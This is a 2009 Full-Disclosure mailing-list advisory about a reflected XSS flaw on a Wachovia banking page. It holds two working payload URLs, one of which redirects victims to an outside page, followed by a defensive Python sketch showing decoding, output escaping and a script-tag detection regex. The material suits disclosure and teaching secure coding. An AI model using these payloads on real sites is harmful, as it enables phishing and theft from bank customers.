
List:       full-disclosure
Subject:    [Full-disclosure] Wachovia Banking Wizard - XSS - PoC
From:       Marshall Whittaker <marshallwhittaker () gmail ! com>
Date:       2009-08-30 13:33:09
Message-ID: 214bc2720908300633v3322a254h29edf74094001d05 () mail ! gmail ! com


This is only a proof of concept, please use this responsibly.
This was reported to Wachovia on Aug 22, 2009 and still broken as of Aug 30, 2009.

Very simple standard cross-site scripting exploit.  As you can see, it works
with HEX as well.  Bad characters obviously aren't filtered correctly.

https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script>document.write('%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>
https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?nextScreen=><script%0A%0D>window.location="http://mapdav.sourceforge.net/wchp/wchpw.html";%3B</script>

--oxagast
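Added example (not part of the post above, and not Wachovia's code): a Python sketch of why the two URLs work and how a defender closes and detects the hole. It decodes the nextScreen parameter the way the server would (so %50%6F%43... becomes "PoC by oxagast" and %0A%0D becomes a CR/LF inside the tag), contrasts a hypothetical unencoded reflection with one that HTML-entity-encodes at output time, and flags the decoded value for log review even when whitespace is used to dodge a literal "<script>" check. The reflected template and the detection regex are assumptions for illustration.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests: the two advisory URLs as the server would see
# them, query string still percent-encoded.
SAMPLE_URLS = [
    "https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?"
    "nextScreen=><script>document.write("
    "'%50%6F%43%20%62%79%20%6F%78%61%67%61%73%74')</script>",
    "https://www.wachovia.com/foundation/forms/wizard/retireWizard.jsp?"
    "nextScreen=><script%0A%0D>window.location="
    '"http://mapdav.sourceforge.net/wchp/wchpw.html";%3B</script>',
]

# "<script" with any whitespace (CR/LF included) before the closing ">":
# the second advisory URL uses %0A%0D so a literal "<script>" check misses it.
_SCRIPT_TAG = re.compile(r"<\s*script(?=[\s>/])", re.IGNORECASE)


def extract_next_screen(url: str) -> str:
    """Percent-decoded nextScreen value, as the JSP would read it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("nextScreen", [""])[0]


def reflect_unsafely(next_screen: str) -> str:
    """Hypothetical reflection of the value with no output encoding (the
    class of defect the advisory describes, not Wachovia's actual JSP)."""
    return f'<input type="hidden" name="nextScreen" value="{next_screen}">'


def reflect_safely(next_screen: str) -> str:
    """Same reflection with HTML entity encoding applied at output time."""
    escaped = html.escape(next_screen, quote=True)
    return f'<input type="hidden" name="nextScreen" value="{escaped}">'


def looks_like_script_injection(next_screen: str) -> bool:
    """Log-review heuristic: does the decoded value carry a <script tag,
    even one padded with CR/LF inside the tag?"""
    return _SCRIPT_TAG.search(next_screen) is not None


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        value = extract_next_screen(url)
        print(repr(value), looks_like_script_injection(value))
        print(reflect_unsafely(value))
        print(reflect_safely(value))
```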


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
